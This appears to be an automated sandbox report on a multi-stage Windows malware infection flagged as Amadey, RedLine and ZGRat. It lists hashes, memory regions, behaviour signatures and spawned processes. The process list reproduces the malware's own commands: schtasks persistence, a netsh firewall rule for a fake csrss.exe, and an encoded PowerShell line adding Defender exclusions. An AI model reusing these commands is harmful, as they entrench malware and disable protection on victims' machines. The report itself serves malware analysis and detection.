C:\Users\Admin\AppData\Local\Temp\main\extracted\xfAk7rC2FeEN35Y8o.exe
| MD5 | 54ce50e8d50599046a20a47555dfb5eb |
| SHA1 | 96a891edc54ba1f6d66fbdde47c884e535c83ebe |
| SHA256 | 3662c80499b08fe24e982ab558897cfca2cd5e7198b1519bc4490a8551b486ac |
| SHA512 | e787782b960dd3d36972616c42be13e66ad15c3ae6c3e3c8c8f04c5667529568a8c7ecceca8a2971fc71b039aea63cb6ebfb49c3263d82a9fb2f654ccb133892 |
C:\Users\Admin\AppData\Local\Temp\main\extracted\file_1.zip
| MD5 | 22a25a629e495aed50731591b05c997a |
| SHA1 | cb93590710e0b2b142fe252f775015237dad10da |
| SHA256 | 16a82ffd653bacaa05e181ec61b0900077955187288908e75c332d3fb54a368d |
| SHA512 | 64d71421cf124e3b4c66020e8ab7a6760625ec40cbb2e960e87d5ad5683cdd09f37bd26353dd98a5a5068ae712c0b6a05a5deff08dea1d4a4cb7da837c6376d2 |
memory/2156-235-0x0000000002770000-0x0000000004770000-memory.dmp
memory/1808-236-0x0000000002030000-0x000000000212E000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\1000573001\moto.exe
| MD5 | f4ec0a6240099958d490c053e0a1b6d4 |
| SHA1 | b00d1d9ec4991c6156d508504276f7fb6428096a |
| SHA256 | 99b156a2926cc2dd2be7df741563a66aef1af075f835cb2b42835eba792f2f70 |
| SHA512 | 60193ad4993cb45a8f859336d38c1af29e9528cd65350c804e856846fcb74276f3e44f470ada4ebe353eeba8f6c6e644c3d500ad695f6951a25516c190189bd4 |
memory/2784-250-0x0000000004610000-0x000000000504D000-memory.dmp
memory/2784-251-0x00000000001D0000-0x00000000005D8000-memory.dmp
memory/2784-252-0x0000000004610000-0x000000000504D000-memory.dmp
memory/2552-253-0x0000000004830000-0x0000000004870000-memory.dmp
memory/2140-254-0x00000000737B0000-0x0000000073E9E000-memory.dmp
memory/2984-255-0x000000013FCD0000-0x000000014070D000-memory.dmp
C:\Users\Admin\AppData\Roaming\006700e5a2ab05\clip64.dll
| MD5 | 85af6c99d918757171d2d280e5ac61ef |
| SHA1 | ba1426d0ecf89825f690adad0a9f3c8c528ed48e |
| SHA256 | 150fb1285c252e2b79dea84efb28722cc22d370328ceb46fb9553de1479e001e |
| SHA512 | 12c061d8ff87cdd3b1f26b84748396e4f56fc1429152e418988e042bc5362df96a2f2c17bcf826d17a8bae9045ee3ba0c063fb565d75c604e47009ff442e8c8e |
memory/2216-269-0x0000000000400000-0x000000000045A000-memory.dmp
memory/2216-268-0x0000000000400000-0x000000000045A000-memory.dmp
memory/2216-267-0x0000000000400000-0x000000000045A000-memory.dmp
memory/2216-270-0x0000000000400000-0x000000000045A000-memory.dmp
memory/2552-273-0x0000000004830000-0x0000000004870000-memory.dmp
memory/2216-272-0x000000007EFDE000-0x000000007EFDF000-memory.dmp
memory/2984-266-0x000000013FCD0000-0x000000014070D000-memory.dmp
memory/2216-275-0x0000000000400000-0x000000000045A000-memory.dmp
memory/2216-280-0x0000000000400000-0x000000000045A000-memory.dmp
memory/2216-278-0x0000000000400000-0x000000000045A000-memory.dmp
memory/2980-281-0x000000013FF70000-0x00000001409AD000-memory.dmp
memory/2492-282-0x0000000140000000-0x000000014000D000-memory.dmp
memory/2492-283-0x0000000140000000-0x000000014000D000-memory.dmp
memory/2492-284-0x0000000140000000-0x000000014000D000-memory.dmp
memory/2156-286-0x00000000737B0000-0x0000000073E9E000-memory.dmp
memory/2492-285-0x0000000140000000-0x000000014000D000-memory.dmp
memory/2492-287-0x0000000140000000-0x000000014000D000-memory.dmp
memory/2484-291-0x0000000140000000-0x0000000140840000-memory.dmp
memory/2484-292-0x0000000140000000-0x0000000140840000-memory.dmp
memory/2492-290-0x0000000140000000-0x000000014000D000-memory.dmp
memory/2484-293-0x0000000140000000-0x0000000140840000-memory.dmp
memory/2484-296-0x0000000140000000-0x0000000140840000-memory.dmp
memory/2484-295-0x0000000140000000-0x0000000140840000-memory.dmp
memory/2484-294-0x0000000140000000-0x0000000140840000-memory.dmp
memory/2484-297-0x0000000140000000-0x0000000140840000-memory.dmp
memory/2484-299-0x0000000140000000-0x0000000140840000-memory.dmp
memory/2484-298-0x0000000140000000-0x0000000140840000-memory.dmp
memory/2484-302-0x0000000140000000-0x0000000140840000-memory.dmp
memory/2484-303-0x00000000001B0000-0x00000000001D0000-memory.dmp
memory/2980-301-0x000000013FF70000-0x00000001409AD000-memory.dmp
memory/2784-304-0x00000000001D0000-0x00000000005D8000-memory.dmp
memory/1728-305-0x0000000001120000-0x0000000001603000-memory.dmp
memory/1808-306-0x0000000002030000-0x0000000002128000-memory.dmp
memory/2140-308-0x00000000048C0000-0x0000000004900000-memory.dmp
memory/1808-307-0x0000000002030000-0x0000000002128000-memory.dmp
memory/1728-310-0x0000000001120000-0x0000000001603000-memory.dmp
memory/1808-311-0x0000000002030000-0x0000000002128000-memory.dmp
memory/2140-313-0x00000000048C0000-0x0000000004900000-memory.dmp
memory/1808-314-0x0000000002030000-0x0000000002128000-memory.dmp
memory/2484-316-0x0000000140000000-0x0000000140840000-memory.dmp
memory/1808-317-0x0000000002030000-0x0000000002128000-memory.dmp
memory/1992-318-0x00000000001D0000-0x00000000005D8000-memory.dmp
memory/1808-332-0x0000000002030000-0x0000000002128000-memory.dmp
memory/1808-330-0x0000000002030000-0x0000000002128000-memory.dmp
memory/1808-328-0x0000000002030000-0x0000000002128000-memory.dmp
memory/1808-326-0x0000000002030000-0x0000000002128000-memory.dmp
memory/1808-324-0x0000000002030000-0x0000000002128000-memory.dmp
memory/1808-321-0x0000000002030000-0x0000000002128000-memory.dmp
memory/2484-319-0x0000000140000000-0x0000000140840000-memory.dmp
memory/1808-477-0x00000000737B0000-0x0000000073E9E000-memory.dmp
memory/1808-573-0x00000000005E0000-0x0000000000620000-memory.dmp
memory/2140-574-0x00000000048C0000-0x0000000004900000-memory.dmp
memory/2552-575-0x0000000004830000-0x0000000004870000-memory.dmp
memory/2484-577-0x0000000000250000-0x0000000000270000-memory.dmp
memory/2384-582-0x00000000013D0000-0x00000000013D8000-memory.dmp
memory/2384-600-0x000007FEF4FF0000-0x000007FEF59DC000-memory.dmp
memory/1868-614-0x0000000000250000-0x0000000000350000-memory.dmp
memory/1784-621-0x0000000000400000-0x000000000040C000-memory.dmp
memory/2784-620-0x0000000004610000-0x000000000504D000-memory.dmp
memory/2784-622-0x0000000004610000-0x000000000504D000-memory.dmp
memory/1784-623-0x00000000737B0000-0x0000000073E9E000-memory.dmp
memory/1784-624-0x0000000004EC0000-0x0000000004F00000-memory.dmp
memory/1992-626-0x00000000001D0000-0x00000000005D8000-memory.dmp
memory/1784-627-0x00000000737B0000-0x0000000073E9E000-memory.dmp
memory/2568-637-0x00000000001D0000-0x00000000005D8000-memory.dmp
memory/2484-639-0x0000000000250000-0x0000000000270000-memory.dmp
Analysis: behavioral2
Detonation Overview
Submitted
2024-01-24 04:15
Reported
2024-01-24 04:17
Platform
win10v2004-20231222-en
Max time kernel
24s
Max time network
152s
Command Line
Signatures
Amadey
Detect ZGRat V1
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
RedLine
RedLine payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
ZGRat
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\rundll32.exe | N/A |
Creates new service(s)
Downloads MZ/PE file
Modifies Windows Firewall
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\netsh.exe | N/A |
Stops running service(s)
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\d887ceb89d\explorhe.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\1000544001\Zjqkz.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\1000571001\Gzxzuhejdab.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\cfd185173a9199f41d4819c7479cd868f6d913b0ca02a37ef93a802939889a6e.exe | N/A |
Executes dropped EXE
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\rundll32.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\InstallSetup7.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\InstallSetup7.exe | N/A |
Reads user/profile data of web browsers
Accesses cryptocurrency files/wallets, possible credential harvesting
Checks installed software on the system
Legitimate hosting services abused for malware hosting/C2
Suspicious use of NtSetInformationThreadHideFromDebugger
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\d887ceb89d\explorhe.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\d887ceb89d\explorhe.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 2092 set thread context of 1956 | N/A | C:\Windows\System32\Conhost.exe | C:\Windows\SysWOW64\WerFault.exe |
| PID 4748 set thread context of 2224 | N/A | C:\Users\Admin\AppData\Local\Temp\1000546001\rdx1122.exe | C:\Windows\SysWOW64\WerFault.exe |
Launches sc.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
Enumerates physical storage devices
Program crash
Checks SCSI registry key(s)
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key enumerated | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Windows\SysWOW64\WerFault.exe | N/A |
Creates scheduled task(s)
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\schtasks.exe | N/A |
Delays execution with timeout.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\timeout.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\1000544001\Zjqkz.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\1000571001\Gzxzuhejdab.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\cfd185173a9199f41d4819c7479cd868f6d913b0ca02a37ef93a802939889a6e.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\d887ceb89d\explorhe.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\BroomSetup.exe | N/A |
Suspicious use of WriteProcessMemory
Views/modifies file attributes
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\attrib.exe | N/A |
Processes
C:\Users\Admin\AppData\Local\Temp\cfd185173a9199f41d4819c7479cd868f6d913b0ca02a37ef93a802939889a6e.exe
"C:\Users\Admin\AppData\Local\Temp\cfd185173a9199f41d4819c7479cd868f6d913b0ca02a37ef93a802939889a6e.exe"
C:\Users\Admin\AppData\Local\Temp\d887ceb89d\explorhe.exe
"C:\Users\Admin\AppData\Local\Temp\d887ceb89d\explorhe.exe"
C:\Windows\SysWOW64\schtasks.exe
"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN explorhe.exe /TR "C:\Users\Admin\AppData\Local\Temp\d887ceb89d\explorhe.exe" /F
C:\Users\Admin\AppData\Local\Temp\1000544001\Zjqkz.exe
"C:\Users\Admin\AppData\Local\Temp\1000544001\Zjqkz.exe"
C:\Users\Admin\AppData\Local\Temp\1000545001\gold1234.exe
"C:\Users\Admin\AppData\Local\Temp\1000545001\gold1234.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
C:\Users\Admin\AppData\Local\Temp\1000546001\rdx1122.exe
"C:\Users\Admin\AppData\Local\Temp\1000546001\rdx1122.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
C:\Users\Admin\AppData\Local\Temp\1000548001\flesh.exe
"C:\Users\Admin\AppData\Local\Temp\1000548001\flesh.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAEEAZABtAGkAbgBcAEEAcABwAEQAYQB0AGEAXABMAG8AYwBhAGwAXABUAGUAbQBwAFwAMQAwADAAMAA1ADQANAAwADAAMQBcAFoAagBxAGsAegAuAGUAeABlADsAIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAHIAbwBjAGUAcwBzACAAWgBqAHEAawB6AC4AZQB4AGUAOwBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQwA6AFwAVQBzAGUAcgBzAFwAQQBkAG0AaQBuAFwAQQBwAHAARABhAHQAYQBcAFIAbwBhAG0AaQBuAGcAXABjAGwAbgB0AC4AZQB4AGUAOwAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAcgBvAGMAZQBzAHMAIABjAGwAbgB0AC4AZQB4AGUA
C:\Users\Admin\AppData\Local\Temp\d887ceb89d\qemu-ga.exe
"C:\Users\Admin\AppData\Local\Temp\d887ceb89d\qemu-ga.exe"
C:\Users\Admin\AppData\Local\Temp\1000552001\store.exe
"C:\Users\Admin\AppData\Local\Temp\1000552001\store.exe"
C:\Windows\SysWOW64\rundll32.exe
"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\006700e5a2ab05\clip64.dll, Main
C:\Users\Admin\AppData\Local\Temp\1000556001\latestrocki.exe
"C:\Users\Admin\AppData\Local\Temp\1000556001\latestrocki.exe"
C:\Users\Admin\AppData\Local\Temp\InstallSetup7.exe
"C:\Users\Admin\AppData\Local\Temp\InstallSetup7.exe"
C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe
"C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe"
C:\Users\Admin\AppData\Local\Temp\BroomSetup.exe
C:\Users\Admin\AppData\Local\Temp\BroomSetup.exe
C:\Users\Admin\AppData\Local\Temp\rty25.exe
"C:\Users\Admin\AppData\Local\Temp\rty25.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4880 -s 352
C:\Users\Admin\AppData\Local\Temp\FirstZ.exe
"C:\Users\Admin\AppData\Local\Temp\FirstZ.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 876 -ip 876
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 876 -s 372
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 876 -s 388
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 500 -p 876 -ip 876
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 552 -p 876 -ip 876
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 448 -p 876 -ip 876
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 420 -p 876 -ip 876
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 876 -s 664
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 876 -s 724
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 876 -s 716
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 876 -s 716
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 448 -p 876 -ip 876
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 876 -s 748
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 420 -p 876 -ip 876
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 560 -p 876 -ip 876
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 448 -p 876 -ip 876
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 876 -s 636
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 876 -s 768
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 876 -s 724
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 876 -s 800
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 876 -s 724
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 876 -ip 876
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 504 -p 876 -ip 876
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 876 -s 888
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 448 -p 876 -ip 876
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 876 -ip 876
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 876 -s 884
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 404 -p 876 -ip 876
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 876 -s 904
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\Temp\Task.bat" "
C:\Windows\SysWOW64\schtasks.exe
schtasks /create /tn "MalayamaraUpdate" /tr "'C:\Users\Admin\AppData\Local\Temp\Updater.exe'" /sc minute /mo 30 /F
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 464 -p 876 -ip 876
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 876 -s 984
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
C:\Users\Admin\AppData\Local\Temp\1000560001\kskskfsf.exe
"C:\Users\Admin\AppData\Local\Temp\1000560001\kskskfsf.exe"
C:\Windows\SysWOW64\chcp.com
chcp 1251
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 876 -s 896
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 560 -p 876 -ip 876
C:\Users\Admin\AppData\Local\Temp\nsfA097.tmp
C:\Users\Admin\AppData\Local\Temp\nsfA097.tmp
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 876 -s 616
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 504 -p 876 -ip 876
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 496 -p 876 -ip 876
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 504 -p 876 -ip 876
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 876 -s 388
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 452 -p 4880 -ip 4880
C:\Users\Admin\AppData\Local\Temp\toolspub1.exe
"C:\Users\Admin\AppData\Local\Temp\toolspub1.exe"
C:\Users\Admin\AppData\Local\Temp\1000563001\pixellslsss.exe
"C:\Users\Admin\AppData\Local\Temp\1000563001\pixellslsss.exe"
C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe
"C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 420 -p 2820 -ip 2820
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 556 -p 2820 -ip 2820
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2820 -s 656
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2820 -s 692
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2820 -s 692
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 448 -p 2820 -ip 2820
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 448 -p 2820 -ip 2820
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2820 -s 748
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2820 -s 712
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2820 -s 720
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 496 -p 2820 -ip 2820
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 412 -p 2820 -ip 2820
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 556 -p 2820 -ip 2820
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 420 -p 2820 -ip 2820
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2820 -s 356
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2820 -s 352
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2820 -s 336
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 556 -p 2820 -ip 2820
C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
C:\Windows\system32\cmd.exe
C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
C:\Users\Admin\AppData\Local\Temp\1000564001\num.exe
"C:\Users\Admin\AppData\Local\Temp\1000564001\num.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\main\main.bat" /S"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Users\Admin\AppData\Local\Temp\1000567001\rback.exe
"C:\Users\Admin\AppData\Local\Temp\1000567001\rback.exe"
C:\Windows\system32\mode.com
mode 65,10
C:\Users\Admin\AppData\Local\Temp\main\7z.exe
7z.exe e extracted/file_2.zip -oextracted
C:\Users\Admin\AppData\Local\Temp\main\xfAk7rC2FeEN35Y8o.exe
"xfAk7rC2FeEN35Y8o.exe"
C:\Windows\system32\attrib.exe
attrib +H "xfAk7rC2FeEN35Y8o.exe"
C:\Users\Admin\AppData\Local\Temp\main\7z.exe
7z.exe e extracted/file_1.zip -oextracted
C:\Windows\rss\csrss.exe
C:\Windows\rss\csrss.exe
C:\Users\Admin\AppData\Local\Temp\main\7z.exe
7z.exe e extracted/file_3.zip -oextracted
C:\Users\Admin\AppData\Local\Temp\main\7z.exe
7z.exe e extracted/file_4.zip -oextracted
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2528 -s 372
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2528 -s 388
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2528 -s 388
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2528 -s 612
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 564 -p 2528 -ip 2528
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2528 -s 728
C:\Users\Admin\AppData\Local\Temp\1000569001\leg221.exe
"C:\Users\Admin\AppData\Local\Temp\1000569001\leg221.exe"
C:\Users\Admin\AppData\Local\Temp\d887ceb89d\explorhe.exe
C:\Users\Admin\AppData\Local\Temp\d887ceb89d\explorhe.exe
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 456 -p 2528 -ip 2528
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 420 -p 2528 -ip 2528
